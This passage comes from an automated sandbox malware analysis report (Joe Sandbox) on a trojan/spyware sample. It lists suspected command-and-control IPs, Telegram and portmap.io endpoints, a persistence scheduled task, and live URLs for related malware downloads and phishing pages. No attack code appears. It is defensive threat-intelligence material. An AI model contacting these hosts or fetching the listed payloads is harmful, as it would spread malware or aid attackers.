                            http://156.245.148.3:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://156.245.142.3:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://156.245.143.25:8080ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://44.228.161.50:443ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://bugs.torproject.org/tpo/core/tor/14917.tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://47.110.140.182:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://blog.torproject.org/blog/lifecycle-of-a-new-relaytor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                              		unknown
                              http://127.0.0.1:2789/pDataffmaba.exe, 00000013.00000002.4510696537.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://156.245.146.28:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://156.245.146.30:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.torproject.org/documentation.htmltor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://156.245.143.23:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://freehaven.net/anonbib/#hs-attack06tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                                		unknown
                                http://156.245.144.19:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9ffmaba.exe, 00000013.00000002.4510696537.0000000002E01000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://47.96.78.224:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2111386860.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROUtor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_userffmaba.exe, 00000013.00000002.4510696537.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://156.245.142.6:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://149.88.44.159:80ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.microsoft.powershell.exe, 00000006.00000002.2114974841.000000000777D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://bugs.torproject.org/tpo/core/tor/21155.tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://101.126.19.171:80ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://185.217.98.121:443ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://156.245.147.30:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://objects.githubusercontent.comffmaba.exe, 00000013.00000002.4510696537.0000000002E01000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.torproject.org/download/download#warningalphabetaThistor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://mingw-w64.sourceforge.net/Xtor-real.exe, 00000019.00000002.4520803669.000000006C492000.00000008.00000001.01000000.0000000F.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://sabotage.nettor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2480334593.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2465033062.0000000003B53000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.teleffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://127.0.0.1:18772/handleOpenWSR?r=ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://support.mozilla.orgffmaba.exe, 00000013.00000002.4541756048.0000000004169000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4541756048.0000000004161000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://bugs.torproject.org/tpo/core/tor/8742.tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.torproject.org/docs/faq.html#BestOSForRelaytor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                193.161.193.99
                                		securefirewall.portmap.ioRussian Federation
                                		198134BITREE-ASRUtrue
                                72.132.134.217
                                		unknownUnited States
                                		20001TWC-20001-PACWESTUSfalse
                                140.78.100.15
                                		unknownAustria
                                		1205JKU-LINZ-ASUniversityLinzATfalse
                                140.82.121.3
                                		github.comUnited States
                                		36459GITHUBUSfalse
                                199.188.200.89
                                		libyaalahrar.coUnited States
                                		22612NAMECHEAP-NETUSfalse
                                208.95.112.1
                                		ip-api.comUnited States
                                		53334TUT-ASUStrue
                                149.154.167.220
                                		api.telegram.orgUnited Kingdom
                                		62041TELEGRAMRUtrue
                                95.217.36.40
                                		unknownGermany
                                		24940HETZNER-ASDEfalse
                                193.142.146.239
                                		unknownNetherlands
                                		208046HOSTSLICK-GERMANYNLfalse
                                51.158.147.144
                                		unknownFrance
                                		12876OnlineSASFRfalse
                                185.199.108.133
                                		objects.githubusercontent.comNetherlands
                                		54113FASTLYUSfalse
                                148.251.191.252
                                		unknownGermany
                                		24940HETZNER-ASDEfalse
                                185.119.118.59
                                		unknownAustria
                                		44133IPAX-ASATfalse

                                Private

                                IP
                                127.0.0.1

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1479415
                                Start date and time:2024-07-23 15:45:43 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 15m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:48
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:yt7dW9nyJK.exe
                                renamed because original name is a hash value
                                Original Sample Name:adbe420a49db30f75d4665ea0014af43.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@67/78@7/14
                                EGA Information:
                                • Successful, ratio: 87.5%
                                HCA Information:
                                • Successful, ratio: 56%
                                • Number of executed functions: 231
                                • Number of non-executed functions: 280
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size exceeded maximum capacity and may have missing network information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: yt7dW9nyJK.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:46:33API Interceptor6538463x Sleep call for process: yt7dW9nyJK.exe modified
                                09:46:34API Interceptor136x Sleep call for process: powershell.exe modified
                                09:46:52API Interceptor5947138x Sleep call for process: ffmaba.exe modified
                                15:46:58Task SchedulerRun new task: ffmaba path: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                208.95.112.1#U00d6deme Talimat#U01312024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • ip-api.com/line/?fields=hosting
                                5i4hBrTNHm.rtfGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                po.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • ip-api.com/line/?fields=hosting
                                DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                Company Profile And PO.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                • ip-api.com/line/?fields=hosting
                                INV 66077.xlsGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                cotizaci#U00f2n.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                AZZASEC ransom (3).exeGet hashmaliciousXTEAM1916 RansomwareBrowse
                                • ip-api.com/line/?fields=hosting
                                AZZASEC ransom (2).exeGet hashmaliciousUnknownBrowse
                                • ip-api.com/line/?fields=hosting
                                193.161.193.99Yq5Gp2g2vB.exeGet hashmaliciousRedLineBrowse
                                • okmaq-24505.portmap.host:24505/
                                JnBNepHH7K.exeGet hashmaliciousAsyncRAT RedLineBrowse
                                • exara32-64703.portmap.host:64703/
                                99SKW728vf.exeGet hashmaliciousRedLineBrowse
                                • lottie9nwtina-55339.portmap.host:55339/
                                amazoninvoiceAF0388d83739dee83479171dbcf.exeGet hashmaliciousRedLineBrowse
                                • tete2792-22120.portmap.host:22120//
                                140.78.100.152y1JbYuXUD.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                  140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                                  • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                                  firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                                  • github.com/john-xor/temp/blob/main/index.html?raw=true
                                  0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                                  • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                  MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                                  • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                  RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                  • github.com/ssbb36/stv/raw/main/5.mp3

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ip-api.com#U00d6deme Talimat#U01312024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 208.95.112.1
                                  5i4hBrTNHm.rtfGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  po.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 208.95.112.1
                                  DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  Company Profile And PO.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  • 208.95.112.1
                                  INV 66077.xlsGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  cotizaci#U00f2n.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  AZZASEC ransom (3).exeGet hashmaliciousXTEAM1916 RansomwareBrowse
                                  • 208.95.112.1
                                  AZZASEC ransom (2).exeGet hashmaliciousUnknownBrowse
                                  • 208.95.112.1
                                  github.com1C24TVT_00005055.pdf.jarGet hashmaliciousSTRRATBrowse
                                  • 140.82.121.3
                                  https://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3DGet hashmaliciousTycoon2FABrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.Win32.Malware-gen.28268.20656.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.9
                                  SecuriteInfo.com.Win32.Malware-gen.28268.20656.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.9
                                  SecuriteInfo.com.Win32.Malware-gen.6320.5781.exeGet hashmaliciousXmrigBrowse
                                  • 140.82.121.5
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  https://forms.office.com/r/dzbBwFxweMGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 140.82.121.4
                                  objects.githubusercontent.comhttps://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3DGet hashmaliciousTycoon2FABrowse
                                  • 185.199.110.133
                                  SecuriteInfo.com.Win32.Malware-gen.6320.5781.exeGet hashmaliciousXmrigBrowse
                                  • 185.199.110.133
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 185.199.108.133
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 185.199.109.133
                                  https://forms.office.com/r/dzbBwFxweMGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 185.199.108.133
                                  https://api-internal.weblinkconnect.com/api/Communication/Communication/1148248/click?url=https://bromosemerutrekking.com/aa-checker%23Monica.pawelec%2Bfirstontario.com&x-tenant=WinterHavenFLCOCGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 185.199.108.133
                                  Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                  • 185.199.109.133
                                  https://a.kerika.com/acc_39TXETMEnauTtVtsNzbfFJ/c/brd_4nvvo2ooyq8HxjaMzCxzZb/cnvs_BfJOZGet hashmaliciousTycoon2FABrowse
                                  • 185.199.109.133
                                  https://a.kerika.com/acc_39TXETMEnauTtVtsNzbfFJ/c/brd_4nvvo2ooyq8HxjaMzCxzZb/cnvs_BfJOZGet hashmaliciousTycoon2FABrowse
                                  • 185.199.110.133
                                  https://www.canva.com/design/DAGLTz418pg/uzEfbpRlOhsQ8izFqH7fIw/edit?utm_content=DAGLTz418pg&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 185.199.111.133
                                  api.telegram.orgNATV0980090004.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  Orden de Compra..exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  kHeNppYRgN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  Fekdjuvq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  neworder.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  ORDER INQUIRY_QTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 149.154.167.220
                                  PqeSvE23O1.exeGet hashmaliciousUnknownBrowse
                                  • 149.154.167.220
                                  Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 149.154.167.220

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  BITREE-ASRUSecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  • 193.161.193.99
                                  SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  • 193.161.193.99
                                  SecuriteInfo.com.Win32.RATX-gen.31110.7671.exeGet hashmaliciousXWormBrowse
                                  • 193.161.193.99
                                  SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exeGet hashmaliciousXWormBrowse
                                  • 193.161.193.99
                                  0aXmWlKxOj.exeGet hashmaliciousXWormBrowse
                                  • 193.161.193.99
                                  DriverUpdt.exeGet hashmaliciousXWormBrowse
                                  • 193.161.193.99
                                  password.exeGet hashmaliciousSugarDump, XWormBrowse
                                  • 193.161.193.99
                                  Project Al Ain (Hilli & Al Fou#U2019ah) Parks.vbeGet hashmaliciousStormKitty, XWormBrowse
                                  • 193.161.193.99
                                  9Ok3QP5FFV.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                  • 193.161.193.99
                                  Client.exeGet hashmaliciousQuasarBrowse
                                  • 193.161.193.99
                                  TWC-20001-PACWESTUS3B4ehVz4C4.elfGet hashmaliciousMiraiBrowse
                                  • 76.90.38.219
                                  PoksxEQkb8.elfGet hashmaliciousUnknownBrowse
                                  • 104.32.81.111
                                  BeI1uexfjo.elfGet hashmaliciousUnknownBrowse
                                  • 172.115.197.199
                                  desDGzeznq.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 157.233.213.255
                                  92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 67.58.153.89
                                  92.249.48.47-skid.arm-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 98.152.4.154
                                  92.249.48.47-skid.mips-2024-07-20T09_04_16.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 23.242.138.178
                                  Qa5qvgWyUn.elfGet hashmaliciousMiraiBrowse
                                  • 172.250.164.146
                                  http://Ccbportal.synology.meGet hashmaliciousUnknownBrowse
                                  • 98.153.95.52
                                  XfStyH0fNY.elfGet hashmaliciousMiraiBrowse
                                  • 24.43.195.247
                                  JKU-LINZ-ASUniversityLinzATj980HN1yJw.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.3.221
                                  jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.202.172
                                  1B7E3FLOXC.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.21.186
                                  W0RBRi467A.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 140.78.249.188
                                  tjC7CVWKsG.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 140.78.249.188
                                  TF2AD5Jnbu.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.114.191
                                  mpsl-20240205-0055.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 140.78.114.188
                                  huhu.mips.elfGet hashmaliciousMiraiBrowse
                                  • 140.78.202.120
                                  aGm9hyTGHd.elfGet hashmaliciousUnknownBrowse
                                  • 140.78.249.192
                                  Kx2DIIG67J.exeGet hashmaliciousBazaLoader, SmokeLoaderBrowse
                                  • 140.78.100.43
                                  GITHUBUS1C24TVT_00005055.pdf.jarGet hashmaliciousSTRRATBrowse
                                  • 140.82.121.3
